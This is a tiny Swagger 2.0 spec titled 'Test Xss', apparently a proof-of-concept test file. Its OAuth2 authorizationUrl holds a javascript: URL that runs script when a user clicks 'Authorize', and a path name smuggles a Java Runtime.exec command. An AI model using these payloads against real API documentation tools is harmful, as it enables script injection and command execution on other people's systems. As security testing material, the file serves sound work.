swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:console.log(document.domain)//
info:
  version: "0.0.1"
  title: Test Xss
  description: Please Autorize!
paths: {          
     /; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \:
    get:
      responses:
        200:
          description: Successful respons
